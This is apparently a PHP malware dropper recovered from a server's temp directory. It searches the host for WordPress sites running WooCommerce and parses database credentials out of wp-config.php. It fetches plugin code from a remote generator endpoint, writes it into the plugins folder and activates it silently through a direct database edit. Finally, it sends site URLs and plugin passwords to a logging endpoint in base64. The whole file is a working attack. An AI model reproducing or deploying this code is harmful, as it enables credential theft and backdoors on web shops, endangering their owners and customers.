File: //proc/self/root/tmp/pr_ImfTzt
<?php
function ensureAndActivateComplexPlugin($wpRoot, $pluginName, $mainPhpContent, $configContent, $imageContent, $imageFileName = 'image.png') {
$pluginDir = $wpRoot . '/wp-content/plugins/' . $pluginName;
$pluginFile = $pluginDir . '/' . $pluginName . '.php';
$configFile = $pluginDir . '/config.php';
$assetsDir = $pluginDir . '/assets/images/';
$imageFile = $assetsDir . '/' . $imageFileName . '.png';
$needInstall = false;
$plugin_install = 0;
if (!is_dir($pluginDir)) {
$needInstall = true;
} elseif (
!is_file($pluginFile) || filesize($pluginFile) === 0 ||
!is_file($configFile) || filesize($configFile) === 0
) {
$needInstall = true;
}
if ($needInstall) {
if (!is_dir($pluginDir)) {
mkdir($pluginDir, 0755, true);
}
if (!is_dir($assetsDir)) {
mkdir($assetsDir, 0755, true);
}
file_put_contents($pluginFile, $mainPhpContent, LOCK_EX);
file_put_contents($configFile, $configContent, LOCK_EX);
file_put_contents($imageFile, $imageContent, LOCK_EX);
$plugin_install = 1;
} else {
$plugin_install = 2;
}
$creds = parseWpConfig($wpRoot);
if (!$creds) {
return 0;
}
$relPath = $pluginName . '/' . $pluginName . '.php';
$result = activateViaDb($creds, $relPath);
if ($result['status'] === 'activated') {
if ($plugin_install == 1) {
$plugin_install = 'activated_true';
} else {
$plugin_install = 'already_exist';
}
} elseif ($result['status'] === 'already_active') {
if ($plugin_install == 1) {
$plugin_install = 'activated_true';
} else {
$plugin_install = 'already_exist';
}
} else {
return 0;
}
return $plugin_install;
}
function activateViaDb($creds, $pluginRelPath) {
try {
$mysqli = new mysqli(
$creds['db_host'],
$creds['db_user'],
$creds['db_password'],
$creds['db_name']
);
} catch (Throwable $e) {
return ['status' => 'db_connect_error', 'msg' => $e->getMessage()];
}
if ($mysqli->connect_errno) {
return ['status' => 'db_connect_error', 'msg' => $mysqli->connect_error];
}
$tbl = $creds['prefix'] . 'options';
$res = $mysqli->query("SELECT option_value FROM `$tbl` WHERE option_name='active_plugins' LIMIT 1");
if (!$res || $res->num_rows === 0) {
return ['status' => 'no_option', 'msg' => 'active_plugins not found'];
}
$row = $res->fetch_assoc();
$arr = @unserialize($row['option_value']);
if (!is_array($arr)) {
return ['status' => 'bad_plugins_data', 'msg' => 'active_plugins value is not an array'];
}
if (in_array($pluginRelPath, $arr, true)) {
return ['status' => 'already_active'];
}
$arr[] = $pluginRelPath;
$ser = $mysqli->real_escape_string(serialize($arr));
$res = $mysqli->query("UPDATE `$tbl` SET option_value='$ser' WHERE option_name='active_plugins'");
if ($res) {
return ['status' => 'activated'];
} else {
return ['status' => 'update_error', 'msg' => $mysqli->error];
}
}
define('EXCLUDED_DIRS', array('node_modules', '.git', 'vendor', 'venv', '__pycache__', 'tmp', 'log', 'logs', 'cache', '.idea', '.vscode', 'env', '.svn', '.hg', '.composer'));
define('KNOWN_BASES', array('/var/www', '/srv/http', '/usr/share/nginx', '/opt/lampp/htdocs', '/home', '\\xampp\\htdocs', '\\wamp64\\www', '\\OSPanel'));
function smartscan($dir) {
if (!is_readable($dir))
return [];
$items = @scandir($dir);
return $items ?: array();
}
function fastWordPressLocator() {
$roots = [];
$docRoot = isset($_SERVER['DOCUMENT_ROOT']) ? $_SERVER['DOCUMENT_ROOT'] : getcwd();
$roots[] = realpath($docRoot);
$roots[] = realpath("$docRoot/..");
$roots[] = realpath("$docRoot/../..");
$roots[] = realpath("$docRoot/../../..");
foreach (KNOWN_BASES as $base) {
$real = realpath($base);
if ($real)
$roots[] = $real;
}
$roots = array_unique(array_filter($roots));
$found = [];
foreach ($roots as $root) {
$dirs = smartscan($root);
foreach ($dirs as $dir) {
if ($dir === '.' || $dir === '..' || in_array($dir, EXCLUDED_DIRS))
continue;
$path = $root . DIRECTORY_SEPARATOR . $dir;
if (!is_dir($path))
continue;
if (
is_file("$path/wp-config.php") &&
is_file("$path/wp-includes/version.php")
) {
$found[] = realpath($path);
continue;
}
$subdirs = smartscan($path);
foreach ($subdirs as $sub) {
if ($sub === '.' || $sub === '..')
continue;
$subPath = $path . DIRECTORY_SEPARATOR . $sub;
if (!is_dir($subPath))
continue;
if (
is_file("$subPath/wp-config.php") &&
is_file("$subPath/wp-includes/version.php")
) {
$found[] = realpath($subPath);
}
}
}
}
return array_values(array_unique($found));
}
function parseWpConfig($wpRoot) {
$cfgPath = $wpRoot . DIRECTORY_SEPARATOR . 'wp-config.php';
if (!is_file($cfgPath))
return false;
$lines = @file($cfgPath, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
if (!$lines)
return false;
$creds = [];
foreach ($lines as $line) {
if (preg_match("/define\s*\(\s*['\"]DB_NAME['\"]\s*,\s*['\"](.+?)['\"]\s*\)/", $line, $m)) {
$creds['db_name'] = $m[1];
}
if (preg_match("/define\s*\(\s*['\"]DB_USER['\"]\s*,\s*['\"](.+?)['\"]\s*\)/", $line, $m)) {
$creds['db_user'] = $m[1];
}
if (preg_match("/define\s*\(\s*['\"]DB_PASSWORD['\"]\s*,\s*['\"](.*?)['\"]\s*\)/", $line, $m)) {
$creds['db_password'] = $m[1];
}
if (preg_match("/define\s*\(\s*['\"]DB_HOST['\"]\s*,\s*['\"](.+?)['\"]\s*\)/", $line, $m)) {
$creds['db_host'] = $m[1];
}
if (preg_match("/\\\$table_prefix\s*=\s*['\"](.+?)['\"]\s*;/", $line, $m)) {
$creds['prefix'] = $m[1];
}
}
if (!isset($creds['db_name'], $creds['db_user'], $creds['db_password'], $creds['db_host'])) {
return false;
}
$creds['prefix'] = isset($creds['prefix']) ? $creds['prefix'] : 'wp_';
return $creds;
}
function getSiteUrl($creds) {
try {
$mysqli = @new mysqli(
$creds['db_host'],
$creds['db_user'],
$creds['db_password'],
$creds['db_name']
);
} catch (\mysqli_sql_exception $e) {
return ['status' => 'db_error', 'msg' => $e->getMessage()];
}
if ($mysqli->connect_errno) {
return ['status' => 'db_error', 'msg' => $mysqli->connect_error];
}
$prefix = $creds['prefix'];
$optTable = $prefix . 'options';
$siteUrl = '';
$siteRes = $mysqli->query("SELECT option_value FROM `$optTable` WHERE option_name = 'siteurl' LIMIT 1");
if ($siteRes && $row = $siteRes->fetch_assoc()) {
$siteUrl = rtrim($row['option_value'], '/');
}
return [
'site_url' => $siteUrl,
'status' => 'ok'
];
}
function check_plugin_evac_ok($folder, $plugin_name) {
if (!file_exists($folder))
return false;
$files = smartscan($folder);
$index = "$plugin_name.php";
if (!in_array($index, $files)) {
return false;
}
if ((!in_array("index.htm", $files)) && (!in_array("index.html", $files))) {
return false;
}
$index_content = file_get_contents($folder . '/' . $index);
if (!preg_match("#/([a-z]+\.txt)['\"]#", $index_content, $match)) {
return false;
}
if (!substr_count($index_content, "Description:")) {
return false;
}
$txt_name = $match[1];
if (!in_array($txt_name, $files)) {
return false;
}
if (!filesize($folder . '/' . $txt_name)) {
return false;
}
if (!file_exists($folder . "/assets/images")) {
return false;
}
if (!file_exists($folder . "/assets/js")) {
return false;
}
$files_images = smartscan($folder . "/assets/images");
$cnt_images = 0;
foreach ($files_images as $image) {
if ((substr_count($image, ".png")) || (substr_count($image, ".gif"))) {
$cnt_images++;
}
}
if ($cnt_images < 5)
return false;
return true;
}
function checkEvacPlugin($creds, $pluginsPath) {
try {
$mysqli = new mysqli(
$creds['db_host'],
$creds['db_user'],
$creds['db_password'],
$creds['db_name']
);
} catch (Throwable $e) {
return false;
}
if ($mysqli->connect_errno) {
return false;
}
$tbl = $creds['prefix'] . 'options';
$res = $mysqli->query("SELECT option_value FROM `$tbl` WHERE option_name='active_plugins' LIMIT 1");
if (!$res || $res->num_rows === 0) {
return false;
}
$row = $res->fetch_assoc();
$arr = @unserialize($row['option_value']);
if (!is_array($arr)) {
return false;
}
foreach ($arr as $plugin_one) {
$plugin_one = strtr($plugin_one, ["\\" => "/"]);
$plugin_one = explode("/", $plugin_one);
$plugin_one = end($plugin_one);
$plugin_name = strtr($plugin_one, [".php" => ""]);
$chars1 = "qwrtpsdghjklzxcvbnm";
$chars2 = "eyuoa";
$found = true;
for ($i = 0; $i < strlen($plugin_name); $i++) {
$c = substr($plugin_name, $i, 1);
if ($i % 2) {
if (!substr_count($chars1, $c)) {
$found = false;
break;
}
} else {
if (!substr_count($chars2, $c)) {
$found = false;
break;
}
}
}
if ($found) {
if (check_plugin_evac_ok($pluginsPath . DIRECTORY_SEPARATOR . $plugin_name, $plugin_name))
return true;
}
}
return false;
}
$foundSites = fastWordPressLocator();
$results = [];
foreach ($foundSites as $wpRoot) {
$siteEntry = [
'path' => $wpRoot
];
if (file_exists($wpRoot . '/wp-content/plugins/woocommerce/woocommerce.php')) {
$creds = parseWpConfig($wpRoot);
if (!$creds) {
$siteEntry['status'] = 'error';
$siteEntry['message'] = 'Invalid wp-config.php';
$results[] = $siteEntry;
continue;
}
$stats = getSiteUrl($creds);
if ($stats['status'] !== 'ok') {
$siteEntry['status'] = 'error';
$siteEntry['message'] = isset($stats['msg']) ? $stats['msg'] : 'Unknown error';
$results[] = $siteEntry;
continue;
}
if (checkEvacPlugin($creds, $wpRoot . '/wp-content/plugins')) {
$siteEntry['status'] = 'error';
$siteEntry['message'] = 'Evac exists';
$results[] = $siteEntry;
continue;
}
$siteEntry['status'] = 'ok';
$siteEntry['site_url'] = $stats['site_url'];
$results[] = $siteEntry;
}
}
foreach ($results as $result) {
$wpRoot = $result['path'];
if (function_exists("curl_init")) {
$options = array(
CURLOPT_RETURNTRANSFER => true,
CURLOPT_HEADER => false,
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_ENCODING => "",
CURLOPT_USERAGENT => "Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20120101 Firefox/32.0",
CURLOPT_AUTOREFERER => true,
CURLOPT_CONNECTTIMEOUT => 120,
CURLOPT_TIMEOUT => 120,
CURLOPT_MAXREDIRS => 10,
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_SSL_VERIFYHOST => 0,
CURLOPT_HTTPHEADER => array(
"Cookie: $cookie_pass"
)
);
$ch = curl_init($url . 'generator.php?nm=' . $result['site_url']);
curl_setopt_array($ch, $options);
$content = @curl_exec($ch);
}
if (!$content) {
$options = array(
"http" => array(
"method" => "GET",
"header" => "Cookie: $cookie_pass\r\n"
)
);
$context = stream_context_create($options);
$content = @file_get_contents($url . 'generator.php?nm=' . $result['site_url'], false, $context);
}
$data = json_decode($content, true);
$pluginName = $data['1'];
$mainPhpContent = $data['2'];
$configContent = $data['3'];
$imageContent = $data['4'];
$imageName = $data['5'];
$pluginPassword = $data['6'];
$res = ensureAndActivateComplexPlugin($wpRoot, $pluginName, $mainPhpContent, $configContent, $imageContent, $imageName);
if (strpos($res, 'activated_true') !== false) {
$res = $result['site_url'] . ':' . $pluginPassword . ' - ' . 'activated_true' . ' | ';
} elseif (strpos($res, 'already_exist') !== false) {
$res = $result['site_url'] . ' - ' . 'already_exist' . ' | ';
} else {
$res = 0;
}
if ($res) {
if (function_exists("curl_init")) {
$options = array(
CURLOPT_RETURNTRANSFER => true,
CURLOPT_HEADER => false,
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_ENCODING => "",
CURLOPT_USERAGENT => "Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20120101 Firefox/32.0",
CURLOPT_AUTOREFERER => true,
CURLOPT_CONNECTTIMEOUT => 120,
CURLOPT_TIMEOUT => 120,
CURLOPT_MAXREDIRS => 10,
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_SSL_VERIFYHOST => 0,
CURLOPT_HTTPHEADER => array(
"Cookie: $cookie_pass"
)
);
$ch = curl_init($url . 'lg.php?lg=' . base64_encode($res));
curl_setopt_array($ch, $options);
$content = @curl_exec($ch);
}
if (!$content) {
$options = array(
"http" => array(
"method" => "GET",
"header" => "Cookie: $cookie_pass\r\n"
)
);
$context = stream_context_create($options);
$content = @file_get_contents($url . 'lg.php?lg=' . base64_encode($res), false, $context);
}
}
}